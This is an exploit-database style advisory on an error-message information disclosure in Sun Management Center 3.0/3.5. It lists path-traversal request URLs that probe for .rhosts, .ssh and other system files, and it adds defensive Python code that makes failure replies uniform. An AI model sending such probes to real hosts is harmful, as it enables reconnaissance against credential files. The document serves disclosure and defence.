Sun Management Center 3.0/3.5 - Error Message Information Disclosure

Author: Jon Hart
type: remote
platform: solaris
date_added: 2003-10-22  
date_updated: 2012-12-09  
verified: 1  

raw file: 23272.txt  
source: https://www.securityfocus.com/bid/8873/info

A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts.

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These example requests return different error messages depending on whether the requested resource exists.
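
The defensive counterpart of the behaviour described above, as an added example that is not from the advisory or from the product's code: a file handler that confines every request to its document root and answers all failures with one identical response, so the reply does not reveal whether a path exists. The names `serve` and `demo` and the directory layout are assumptions made for illustration.

```python
import os
import tempfile
from urllib.parse import unquote

# One generic reply for every failure, so the response carries no existence signal.
NOT_FOUND = (404, b"Not Found")

def serve(docroot, request_path):
    """Return (status, body) for request_path, confined to docroot."""
    root = os.path.realpath(docroot)
    # Decode percent-escapes first so an encoded "../" is treated like the literal form.
    decoded = unquote(request_path.split("?", 1)[0])
    if "\x00" in decoded:
        return NOT_FOUND
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # Anything resolving outside the document root (traversal or symlink) is refused
    # with the same reply as a missing file.
    if os.path.commonpath([root, candidate]) != root:
        return NOT_FOUND
    if not os.path.isfile(candidate):
        return NOT_FOUND
    with open(candidate, "rb") as fh:
        return (200, fh.read())

def demo():
    """Build a constructed directory layout and return replies for sample requests."""
    with tempfile.TemporaryDirectory() as base:
        docroot = os.path.join(base, "docroot")
        os.mkdir(docroot)
        with open(os.path.join(docroot, "index.html"), "wb") as fh:
            fh.write(b"<html>ok</html>")
        # A file that exists outside the document root (constructed stand-in).
        with open(os.path.join(base, "secret"), "wb") as fh:
            fh.write(b"x")
        return {
            "inside": serve(docroot, "/index.html"),
            "outside_exists": serve(docroot, "/../secret"),
            "outside_missing": serve(docroot, "/../no-such-file"),
            "encoded": serve(docroot, "/%2e%2e/secret"),
            "inside_missing": serve(docroot, "/missing.html"),
        }

if __name__ == "__main__":
    for name, reply in demo().items():
        print(name, reply)
```

The property to check is that `outside_exists` and `outside_missing` are byte-identical; any difference in status, body or headers between them reintroduces the disclosure.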